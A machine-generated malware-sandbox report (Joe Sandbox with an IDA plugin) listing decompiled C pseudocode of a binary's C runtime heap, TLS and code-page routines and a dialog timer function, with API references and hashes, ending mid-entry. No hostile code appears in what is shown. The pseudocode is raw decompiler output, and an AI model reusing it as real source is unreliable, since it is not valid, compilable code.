                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00415523() {
                                          				void _t10;
                                          				long _t15;
                                          				void* _t16;
                                          
                                          				_t15 = GetLastError();
                                          				_t16 = TlsGetValue( *0x420740);
                                          				if(_t16 == 0) {
                                          					_t16 = E00416EFC(1, 0x74);
                                          					if(_t16 == 0 || TlsSetValue( *0x420740, _t16) == 0) {
                                          						E00414C0C(0x10);
                                          					} else {
                                          						E00415510(_t16);
                                          						_t10 = GetCurrentThreadId();
                                          						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
                                          						 *_t16 = _t10;
                                          					}
                                          				}
                                          				SetLastError(_t15);
                                          				return _t16;
                                          			}







                                          APIs
                                          • GetLastError.KERNEL32(00000103,7FFFFFFF,00416EEF,00417BBE,00000000,?,?,00000000,00000001), ref: 00415525
                                          • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 00415533
                                          • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0041557F
                                            • Part of subcall function 00416EFC: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00416FF2
                                          • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00415557
                                          • GetCurrentThreadId.KERNEL32 ref: 00415568
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue$AllocCurrentHeapThread
                                          • String ID:
                                          • API String ID: 2020098873-0
                                          • Opcode ID: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
                                          • Instruction ID: cede6b9146d9eee740ee2dfbc4b23865fcca372efd47330e9e203dd76af2c63a
                                          • Opcode Fuzzy Hash: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
                                          • Instruction Fuzzy Hash: 09F09635A01611BBC7312B74AC096DB3E62EB857A1B51413AF551962A4DB28888196EC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E00417E3A(int _a4) {
                                          				signed int _v8;
                                          				char _v21;
                                          				char _v22;
                                          				struct _cpinfo _v28;
                                          				void* __ebx;
                                          				void* __edi;
                                          				intOrPtr* _t36;
                                          				signed int _t40;
                                          				signed int _t41;
                                          				int _t43;
                                          				signed int _t47;
                                          				signed int _t49;
                                          				int _t50;
                                          				signed char* _t51;
                                          				signed int _t55;
                                          				signed char* _t57;
                                          				signed int _t60;
                                          				intOrPtr* _t63;
                                          				signed int _t65;
                                          				signed char _t66;
                                          				signed char _t68;
                                          				signed char _t69;
                                          				signed int _t70;
                                          				void* _t71;
                                          				signed int _t74;
                                          				signed int _t77;
                                          				signed int _t79;
                                          				signed int _t81;
                                          				void* _t85;
                                          
                                          				E0041570A(0x19);
                                          				_t50 = E00417FE7(_a4);
                                          				_t85 = _t50 -  *0x4256c8; // 0x4e4
                                          				_a4 = _t50;
                                          				if(_t85 != 0) {
                                          					__eflags = _t50;
                                          					if(_t50 == 0) {
                                          						L30:
                                          						E00418064();
                                          					} else {
                                          						_t65 = 0;
                                          						__eflags = 0;
                                          						_t36 = 0x422af8;
                                          						while(1) {
                                          							__eflags =  *_t36 - _t50;
                                          							if( *_t36 == _t50) {
                                          								break;
                                          							}
                                          							_t36 = _t36 + 0x30;
                                          							_t65 = _t65 + 1;
                                          							__eflags = _t36 - 0x422be8;
                                          							if(_t36 < 0x422be8) {
                                          								continue;
                                          							} else {
                                          								_t43 = GetCPInfo(_t50,  &_v28);
                                          								_t81 = 1;
                                          								__eflags = _t43 - _t81;
                                          								if(_t43 != _t81) {
                                          									__eflags =  *0x423510;
                                          									if( *0x423510 == 0) {
                                          										_t77 = _t81 | 0xffffffff;
                                          										__eflags = _t77;
                                          									} else {
                                          										goto L30;
                                          									}
                                          								} else {
                                          									 *0x4258e4 =  *0x4258e4 & 0x00000000;
                                          									_t60 = 0x40;
                                          									__eflags = _v28 - _t81;
                                          									memset(0x4257e0, 0, _t60 << 2);
                                          									asm("stosb");
                                          									 *0x4256c8 = _t50;
                                          									if(__eflags <= 0) {
                                          										 *0x4256dc =  *0x4256dc & 0x00000000;
                                          										__eflags =  *0x4256dc;
                                          									} else {
                                          										__eflags = _v22;
                                          										if(_v22 != 0) {
                                          											_t63 =  &_v21;
                                          											while(1) {
                                          												_t69 =  *_t63;
                                          												__eflags = _t69;
                                          												if(_t69 == 0) {
                                          													goto L24;
                                          												}
                                          												_t49 =  *(_t63 - 1) & 0x000000ff;
                                          												_t70 = _t69 & 0x000000ff;
                                          												while(1) {
                                          													__eflags = _t49 - _t70;
                                          													if(_t49 > _t70) {
                                          														break;
                                          													}
                                          													 *(_t49 + 0x4257e1) =  *(_t49 + 0x4257e1) | 0x00000004;
                                          													_t49 = _t49 + 1;
                                          												}
                                          												_t63 = _t63 + 2;
                                          												__eflags =  *(_t63 - 1);
                                          												if( *(_t63 - 1) != 0) {
                                          													continue;
                                          												}
                                          												goto L24;
                                          											}
                                          										}
                                          										L24:
                                          										_t47 = _t81;
                                          										do {
                                          											 *(_t47 + 0x4257e1) =  *(_t47 + 0x4257e1) | 0x00000008;
                                          											_t47 = _t47 + 1;
                                          											__eflags = _t47 - 0xff;
                                          										} while (_t47 < 0xff);
                                          										 *0x4258e4 = E00418031(_t50);
                                          										 *0x4256dc = _t81;
                                          									}
                                          									_t71 = 0x4256d0;
                                          									asm("stosd");
                                          									asm("stosd");
                                          									asm("stosd");
                                          									L31:
                                          									E0041808D(_t50, _t71);
                                          									goto L1;
                                          								}
                                          							}
                                          							goto L33;
                                          						}
                                          						_v8 = _v8 & 0x00000000;
                                          						_t55 = 0x40;
                                          						memset(0x4257e0, 0, _t55 << 2);
                                          						_t79 = _t65 + _t65 * 2 << 4;
                                          						__eflags = _t79;
                                          						asm("stosb");
                                          						_t16 = _t79 + 0x422b08; // 0x422b08
                                          						_t51 = _t16;
                                          						do {
                                          							__eflags =  *_t51;
                                          							_t57 = _t51;
                                          							if( *_t51 != 0) {
                                          								while(1) {
                                          									_t17 =  &(_t57[1]); // 0xdf
                                          									_t66 =  *_t17;
                                          									__eflags = _t66;
                                          									if(_t66 == 0) {
                                          										goto L21;
                                          									}
                                          									_t41 =  *_t57 & 0x000000ff;
                                          									_t74 = _t66 & 0x000000ff;
                                          									__eflags = _t41 - _t74;
                                          									if(_t41 <= _t74) {
                                          										_t19 = _v8 + 0x422af0; // 0x8040201
                                          										_t68 =  *_t19;
                                          										do {
                                          											 *(_t41 + 0x4257e1) =  *(_t41 + 0x4257e1) | _t68;
                                          											_t41 = _t41 + 1;
                                          											__eflags = _t41 - _t74;
                                          										} while (_t41 <= _t74);
                                          									}
                                          									_t57 =  &(_t57[2]);
                                          									__eflags =  *_t57;
                                          									if( *_t57 != 0) {
                                          										continue;
                                          									}
                                          									goto L21;
                                          								}
                                          							}
                                          							L21:
                                          							_v8 = _v8 + 1;
                                          							_t51 =  &(_t51[8]);
                                          							__eflags = _v8 - 4;
                                          						} while (_v8 < 4);
                                          						 *0x4256dc = 1;
                                          						 *0x4256c8 = _a4;
                                          						_t40 = E00418031(_a4);
                                          						_t71 = 0x4256d0;
                                          						asm("movsd");
                                          						asm("movsd");
                                          						 *0x4258e4 = _t40;
                                          						asm("movsd");
                                          					}
                                          					goto L31;
                                          				} else {
                                          					L1:
                                          					_t77 = 0;
                                          				}
                                          				L33:
                                          				E0041576B(0x19);
                                          				return _t77;
                                          			}

































                                          APIs
                                            • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                            • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                                          • GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,00414BA4), ref: 00417E8B
                                            • Part of subcall function 0041576B: LeaveCriticalSection.KERNEL32(?,00413F70,00000009,00413F5C,00000000,?,00000000,00000000,00000000), ref: 00415778
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterInfoInitializeLeave
                                          • String ID: +B$WB$WB
                                          • API String ID: 1866836854-4076192905
                                          • Opcode ID: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
                                          • Instruction ID: 91cfe2518806d3d9ee68befd2fe7c4d9c34af4d87c59522c175cbc6726151178
                                          • Opcode Fuzzy Hash: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
                                          • Instruction Fuzzy Hash: FC41243164C654AEE720DB24D8853EB7BF1AB05314FB4406BE5488B291CABD49C7C74C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E0041458F(void* _a4, long _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v20;
                                          				long _v36;
                                          				void* _v40;
                                          				intOrPtr _v44;
                                          				char _v48;
                                          				long _v52;
                                          				long _v56;
                                          				char _v60;
                                          				intOrPtr _t56;
                                          				void* _t57;
                                          				long _t58;
                                          				long _t59;
                                          				long _t63;
                                          				long _t66;
                                          				long _t68;
                                          				long _t71;
                                          				long _t72;
                                          				long _t74;
                                          				long _t78;
                                          				intOrPtr _t80;
                                          				void* _t83;
                                          				long _t85;
                                          				long _t88;
                                          				void* _t89;
                                          				long _t91;
                                          				intOrPtr _t93;
                                          				void* _t97;
                                          				void* _t104;
                                          				long _t113;
                                          				long _t116;
                                          				intOrPtr _t122;
                                          				void* _t123;
                                          
                                          				_push(0xffffffff);
                                          				_push(0x41b9b8);
                                          				_push(E00414A2C);
                                          				_push( *[fs:0x0]);
                                          				 *[fs:0x0] = _t122;
                                          				_t123 = _t122 - 0x28;
                                          				_t97 = _a4;
                                          				_t113 = 0;
                                          				if(_t97 != 0) {
                                          					_t116 = _a8;
                                          					__eflags = _t116;
                                          					if(_t116 != 0) {
                                          						_t56 =  *0x425a38; // 0x1
                                          						__eflags = _t56 - 3;
                                          						if(_t56 != 3) {
                                          							__eflags = _t56 - 2;
                                          							if(_t56 != 2) {
                                          								while(1) {
                                          									_t57 = 0;
                                          									__eflags = _t116 - 0xffffffe0;
                                          									if(_t116 <= 0xffffffe0) {
                                          										__eflags = _t116 - _t113;
                                          										if(_t116 == _t113) {
                                          											_t116 = 1;
                                          										}
                                          										_t116 = _t116 + 0x0000000f & 0xfffffff0;
                                          										__eflags = _t116;
                                          										_t57 = HeapReAlloc( *0x425a34, _t113, _t97, _t116);
                                          									}
                                          									__eflags = _t57 - _t113;
                                          									if(_t57 != _t113) {
                                          										goto L64;
                                          									}
                                          									__eflags =  *0x4233b4 - _t113; // 0x0
                                          									if(__eflags == 0) {
                                          										goto L64;
                                          									}
                                          									_t58 = E00415868(_t116);
                                          									__eflags = _t58;
                                          									if(_t58 != 0) {
                                          										continue;
                                          									}
                                          									goto L63;
                                          								}
                                          								goto L64;
                                          							}
                                          							__eflags = _t116 - 0xffffffe0;
                                          							if(_t116 <= 0xffffffe0) {
                                          								__eflags = _t116;
                                          								if(_t116 <= 0) {
                                          									_t116 = 0x10;
                                          								} else {
                                          									_t116 = _t116 + 0x0000000f & 0xfffffff0;
                                          								}
                                          								_a8 = _t116;
                                          							}
                                          							while(1) {
                                          								_v40 = _t113;
                                          								__eflags = _t116 - 0xffffffe0;
                                          								if(_t116 <= 0xffffffe0) {
                                          									E0041570A(9);
                                          									_pop(_t104);
                                          									_v8 = 1;
                                          									_t63 = E004167F8(_t97,  &_v60,  &_v48);
                                          									_t123 = _t123 + 0xc;
                                          									_t113 = _t63;
                                          									_v52 = _t113;
                                          									__eflags = _t113;
                                          									if(_t113 == 0) {
                                          										_v40 = HeapReAlloc( *0x425a34, 0, _t97, _t116);
                                          									} else {
                                          										__eflags = _t116 -  *0x42283c; // 0x1e0
                                          										if(__eflags < 0) {
                                          											_t100 = _t116 >> 4;
                                          											_t71 = E00416BC0(_t104, _v60, _v48, _t113, _t116 >> 4);
                                          											_t123 = _t123 + 0x10;
                                          											__eflags = _t71;
                                          											if(_t71 == 0) {
                                          												_t72 = E00416894(_t104, _t100);
                                          												_v40 = _t72;
                                          												__eflags = _t72;
                                          												if(_t72 != 0) {
                                          													_t74 = ( *_t113 & 0x000000ff) << 4;
                                          													_v56 = _t74;
                                          													__eflags = _t74 - _t116;
                                          													if(_t74 >= _t116) {
                                          														_t74 = _t116;
                                          													}
                                          													E00414090(_v40, _a4, _t74);
                                          													E0041684F(_v60, _v48, _t113);
                                          													_t123 = _t123 + 0x18;
                                          												}
                                          											} else {
                                          												_v40 = _a4;
                                          											}
                                          											_t97 = _a4;
                                          										}
                                          										__eflags = _v40;
                                          										if(_v40 == 0) {
                                          											_t66 = HeapAlloc( *0x425a34, 0, _t116);
                                          											_v40 = _t66;
                                          											__eflags = _t66;
                                          											if(_t66 != 0) {
                                          												_t68 = ( *_t113 & 0x000000ff) << 4;
                                          												_v56 = _t68;
                                          												__eflags = _t68 - _t116;
                                          												if(_t68 >= _t116) {
                                          													_t68 = _t116;
                                          												}
                                          												E00414090(_v40, _t97, _t68);
                                          												E0041684F(_v60, _v48, _t113);
                                          												_t123 = _t123 + 0x18;
                                          											}
                                          										}
                                          									}
                                          									_t51 =  &_v8;
                                          									 *_t51 = _v8 | 0xffffffff;
                                          									__eflags =  *_t51;
                                          									E00414868();
                                          								}
                                          								_t57 = _v40;
                                          								__eflags = _t57 - _t113;
                                          								if(_t57 != _t113) {
                                          									goto L64;
                                          								}
                                          								__eflags =  *0x4233b4 - _t113; // 0x0
                                          								if(__eflags == 0) {
                                          									goto L64;
                                          								}
                                          								_t59 = E00415868(_t116);
                                          								__eflags = _t59;
                                          								if(_t59 != 0) {
                                          									continue;
                                          								}
                                          								goto L63;
                                          							}
                                          							goto L64;
                                          						} else {
                                          							goto L5;
                                          						}
                                          						do {
                                          							L5:
                                          							_v40 = _t113;
                                          							__eflags = _t116 - 0xffffffe0;
                                          							if(_t116 > 0xffffffe0) {
                                          								L25:
                                          								_t57 = _v40;
                                          								__eflags = _t57 - _t113;
                                          								if(_t57 != _t113) {
                                          									goto L64;
                                          								}
                                          								__eflags =  *0x4233b4 - _t113; // 0x0
                                          								if(__eflags == 0) {
                                          									goto L64;
                                          								}
                                          								goto L27;
                                          							}
                                          							E0041570A(9);
                                          							_v8 = _t113;
                                          							_t80 = E00415A9D(_t97);
                                          							_v44 = _t80;
                                          							__eflags = _t80 - _t113;
                                          							if(_t80 == _t113) {
                                          								L21:
                                          								_v8 = _v8 | 0xffffffff;
                                          								E0041471A();
                                          								__eflags = _v44 - _t113;
                                          								if(_v44 == _t113) {
                                          									__eflags = _t116 - _t113;
                                          									if(_t116 == _t113) {
                                          										_t116 = 1;
                                          									}
                                          									_t116 = _t116 + 0x0000000f & 0xfffffff0;
                                          									__eflags = _t116;
                                          									_a8 = _t116;
                                          									_v40 = HeapReAlloc( *0x425a34, _t113, _t97, _t116);
                                          								}
                                          								goto L25;
                                          							}
                                          							__eflags = _t116 -  *0x425a30; // 0x0
                                          							if(__eflags <= 0) {
                                          								_push(_t116);
                                          								_push(_t97);
                                          								_push(_t80);
                                          								_t88 = E004162A6();
                                          								_t123 = _t123 + 0xc;
                                          								__eflags = _t88;
                                          								if(_t88 == 0) {
                                          									_push(_t116);
                                          									_t89 = E00415DF1();
                                          									_v40 = _t89;
                                          									__eflags = _t89 - _t113;
                                          									if(_t89 != _t113) {
                                          										_t91 =  *((intOrPtr*)(_t97 - 4)) - 1;
                                          										_v36 = _t91;
                                          										__eflags = _t91 - _t116;
                                          										if(_t91 >= _t116) {
                                          											_t91 = _t116;
                                          										}
                                          										E00414090(_v40, _t97, _t91);
                                          										_t93 = E00415A9D(_t97);
                                          										_v44 = _t93;
                                          										_push(_t97);
                                          										_push(_t93);
                                          										E00415AC8();
                                          										_t123 = _t123 + 0x18;
                                          									}
                                          								} else {
                                          									_v40 = _t97;
                                          								}
                                          							}
                                          							__eflags = _v40 - _t113;
                                          							if(_v40 == _t113) {
                                          								__eflags = _t116 - _t113;
                                          								if(_t116 == _t113) {
                                          									_t116 = 1;
                                          									_a8 = _t116;
                                          								}
                                          								_t116 = _t116 + 0x0000000f & 0xfffffff0;
                                          								_a8 = _t116;
                                          								_t83 = HeapAlloc( *0x425a34, _t113, _t116);
                                          								_v40 = _t83;
                                          								__eflags = _t83 - _t113;
                                          								if(_t83 != _t113) {
                                          									_t85 =  *((intOrPtr*)(_t97 - 4)) - 1;
                                          									_v36 = _t85;
                                          									__eflags = _t85 - _t116;
                                          									if(_t85 >= _t116) {
                                          										_t85 = _t116;
                                          									}
                                          									E00414090(_v40, _t97, _t85);
                                          									_push(_t97);
                                          									_push(_v44);
                                          									E00415AC8();
                                          									_t123 = _t123 + 0x14;
                                          								}
                                          							}
                                          							goto L21;
                                          							L27:
                                          							_t78 = E00415868(_t116);
                                          							__eflags = _t78;
                                          						} while (_t78 != 0);
                                          						goto L63;
                                          					} else {
                                          						E00413F9F(_t97);
                                          						L63:
                                          						_t57 = 0;
                                          						__eflags = 0;
                                          						goto L64;
                                          					}
                                          				} else {
                                          					_t57 = E00413E65(_a8);
                                          					L64:
                                          					 *[fs:0x0] = _v20;
                                          					return _t57;
                                          				}
                                          			}


                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
                                          • Instruction ID: b0a20c71c01645f6642c62949d543ab21d76ee58160ce25a59b39075e73dd19d
                                          • Opcode Fuzzy Hash: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
                                          • Instruction Fuzzy Hash: 4691E671D01514ABCB21AB69DC85ADEBBB4EFC5764F240227F818B62D0D7398DC1CA6C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041659C() {
                                          				void* _t25;
                                          				intOrPtr* _t28;
                                          				void* _t42;
                                          				void* _t43;
                                          				void* _t45;
                                          				void* _t55;
                                          
                                          				if( *0x420828 != 0xffffffff) {
                                          					_t43 = HeapAlloc( *0x425a34, 0, 0x2020);
                                          					if(_t43 == 0) {
                                          						goto L20;
                                          					}
                                          					goto L3;
                                          				} else {
                                          					_t43 = 0x420818;
                                          					L3:
                                          					_t42 = VirtualAlloc(0, 0x400000, 0x2000, 4);
                                          					if(_t42 == 0) {
                                          						L18:
                                          						if(_t43 != 0x420818) {
                                          							HeapFree( *0x425a34, 0, _t43);
                                          						}
                                          						L20:
                                          						return 0;
                                          					}
                                          					if(VirtualAlloc(_t42, 0x10000, 0x1000, 4) == 0) {
                                          						VirtualFree(_t42, 0, 0x8000);
                                          						goto L18;
                                          					}
                                          					if(_t43 != 0x420818) {
                                          						 *_t43 = 0x420818;
                                          						_t25 =  *0x42081c; // 0x420818
                                          						 *(_t43 + 4) = _t25;
                                          						 *0x42081c = _t43;
                                          						 *( *(_t43 + 4)) = _t43;
                                          					} else {
                                          						if( *0x420818 == 0) {
                                          							 *0x420818 = 0x420818;
                                          						}
                                          						if( *0x42081c == 0) {
                                          							 *0x42081c = 0x420818;
                                          						}
                                          					}
                                          					_t3 = _t42 + 0x400000; // 0x400000
                                          					_t4 = _t43 + 0x98; // 0x98
                                          					 *((intOrPtr*)(_t43 + 0x14)) = _t3;
                                          					_t6 = _t43 + 0x18; // 0x18
                                          					_t28 = _t6;
                                          					 *((intOrPtr*)(_t43 + 0xc)) = _t4;
                                          					 *(_t43 + 0x10) = _t42;
                                          					 *((intOrPtr*)(_t43 + 8)) = _t28;
                                          					_t45 = 0;
                                          					do {
                                          						_t55 = _t45 - 0x10;
                                          						_t45 = _t45 + 1;
                                          						 *_t28 = ((0 | _t55 >= 0x00000000) - 0x00000001 & 0x000000f1) - 1;
                                          						 *((intOrPtr*)(_t28 + 4)) = 0xf1;
                                          						_t28 = _t28 + 8;
                                          					} while (_t45 < 0x400);
                                          					E00417DA0(_t42, 0, 0x10000);
                                          					while(_t42 <  *(_t43 + 0x10) + 0x10000) {
                                          						 *(_t42 + 0xf8) =  *(_t42 + 0xf8) | 0x000000ff;
                                          						_t16 = _t42 + 8; // -4088
                                          						 *_t42 = _t16;
                                          						 *((intOrPtr*)(_t42 + 4)) = 0xf0;
                                          						_t42 = _t42 + 0x1000;
                                          					}
                                          					return _t43;
                                          				}
                                          			}










                                          APIs
                                          • HeapAlloc.KERNEL32(00000000,00002020,00420818,00420818,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165BD
                                          • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165E1
                                          • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165FB
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?), ref: 004166BC
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?,00000000), ref: 004166D3
                                          Similarity
                                          • API ID: AllocVirtual$FreeHeap
                                          • String ID:
                                          • API String ID: 714016831-0
                                          • Opcode ID: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
                                          • Instruction ID: 0af9858cac0a30669fb94f5f64461d90f8de944a7195c69e4f59e8ed45fdce2d
                                          • Opcode Fuzzy Hash: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
                                          • Instruction Fuzzy Hash: 983101B0700705EBD3309F24EC45BA2BBE4EB44794F12823AE55597791E778E8818BCC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E00409787(void* __ecx, void* __edx) {
                                          				signed int _t48;
                                          				intOrPtr* _t54;
                                          				signed int _t60;
                                          				intOrPtr _t61;
                                          				void* _t76;
                                          				struct _CRITICAL_SECTION* _t80;
                                          				signed int _t81;
                                          				void* _t84;
                                          				void* _t86;
                                          
                                          				_t76 = __edx;
                                          				E00413954(E00419CC0, _t86);
                                          				_t84 = __ecx;
                                          				_t80 = __ecx + 0x40;
                                          				if(E004095DD(_t80) == 0) {
                                          					E0040998D(__ecx);
                                          					EnterCriticalSection(_t80);
                                          					_t60 =  *(_t80 + 0x20);
                                          					 *(_t86 - 0x10) =  *(_t80 + 0x24);
                                          					 *((intOrPtr*)(_t86 - 0x20)) =  *((intOrPtr*)(_t80 + 0x28));
                                          					 *((intOrPtr*)(_t86 - 0x1c)) =  *((intOrPtr*)(_t80 + 0x2c));
                                          					LeaveCriticalSection(_t80);
                                          					if(_t60 !=  *((intOrPtr*)(_t84 + 0x28)) ||  *(_t86 - 0x10) !=  *((intOrPtr*)(_t84 + 0x2c))) {
                                          						E0040969B(_t84, _t60,  *(_t86 - 0x10));
                                          					}
                                          					E0040970E(_t84,  *((intOrPtr*)(_t86 - 0x20)),  *((intOrPtr*)(_t86 - 0x1c)));
                                          					_t81 = 0;
                                          					if((_t60 |  *(_t86 - 0x10)) == 0) {
                                          						 *(_t86 - 0x10) = _t81;
                                          						_t60 = 1;
                                          					}
                                          					_t61 = E00413D80(E00414490( *((intOrPtr*)(_t86 - 0x20)),  *((intOrPtr*)(_t86 - 0x1c)), 0x64, _t81), _t76, _t60,  *(_t86 - 0x10));
                                          					if(_t61 !=  *((intOrPtr*)(_t84 + 0x34))) {
                                          						asm("cdq");
                                          						E00403A0B(_t86 - 0xa4, _t76, _t47, _t76);
                                          						E00401C80(_t86 - 0x18, _t86 - 0xa4);
                                          						 *(_t86 - 4) = _t81;
                                          						E00407D25(_t86 - 0x18, _t76, L"% ");
                                          						_push(_t84 + 0xc);
                                          						_t54 = E00402634(_t86 - 0x24, _t86 - 0x18);
                                          						 *(_t86 - 4) = 1;
                                          						E00406049( *((intOrPtr*)(_t84 + 4)),  *_t54);
                                          						E00403A9C( *((intOrPtr*)(_t86 - 0x24)));
                                          						 *((intOrPtr*)(_t84 + 0x34)) = _t61;
                                          						E00403A9C( *((intOrPtr*)(_t86 - 0x18)));
                                          					}
                                          					_t48 = 1;
                                          				} else {
                                          					_t48 = 1;
                                          				}
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t86 - 0xc));
                                          				return _t48;
                                          			}













                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040978C
                                            • Part of subcall function 004095DD: EnterCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095E2
                                            • Part of subcall function 004095DD: LeaveCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095EC
                                          • EnterCriticalSection.KERNEL32(?), ref: 004097B9
                                          • LeaveCriticalSection.KERNEL32(?), ref: 004097D5
                                          • __aulldiv.LIBCMT ref: 00409824
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$H_prolog__aulldiv
                                          • String ID:
                                          • API String ID: 3848147900-0
                                          • Opcode ID: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
                                          • Instruction ID: 0a470d0c852558693c62499fef9fcf54cb9603282822d0262474d13d459b1607
                                          • Opcode Fuzzy Hash: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
                                          • Instruction Fuzzy Hash: D2316076A00219AFCB10EFA1C881AEFBBB5FF48314F00442EE10573692CB79AD45CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004095F7(void* __ecx) {
                                          				void* _t32;
                                          
                                          				_t32 = __ecx;
                                          				 *(__ecx + 0x28) =  *(__ecx + 0x28) | 0xffffffff;
                                          				 *(__ecx + 0x2c) =  *(__ecx + 0x2c) | 0xffffffff;
                                          				 *(__ecx + 0x34) =  *(__ecx + 0x34) | 0xffffffff;
                                          				 *((char*)(__ecx + 0x38)) = 1;
                                          				E00413260(__ecx + 0x3c);
                                          				 *((intOrPtr*)(_t32 + 0x30)) = GetDlgItem( *(__ecx + 4), 0x3e8);
                                          				if( *(_t32 + 0x70) >= 0) {
                                          					SendMessageA( *(_t32 + 4), 0x80, 1, LoadIconA( *0x423144,  *(_t32 + 0x70) & 0x0000ffff));
                                          				}
                                          				 *((intOrPtr*)(_t32 + 8)) = SetTimer( *(_t32 + 4), 3, 0x64, 0);
                                          				E00406049( *(_t32 + 4),  *((intOrPtr*)(_t32 + 0xc)));
                                          				E0040998D(_t32);
                                          				return 1;
                                          			}





                                          APIs
                                            • Part of subcall function 00413260: SetEvent.KERNEL32(00000000,00407649), ref: 00413263
                                          • GetDlgItem.USER32 ref: 0040961A
                                          • LoadIconA.USER32(00000000), ref: 00409634
                                          • SendMessageA.USER32 ref: 00409645
                                          • SetTimer.USER32(?,00000003,00000064,00000000), ref: 00409654
                                          Similarity
                                          • API ID: EventIconItemLoadMessageSendTimer
                                          • String ID:
                                          • API String ID: 2758541657-0
                                          • Opcode ID: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
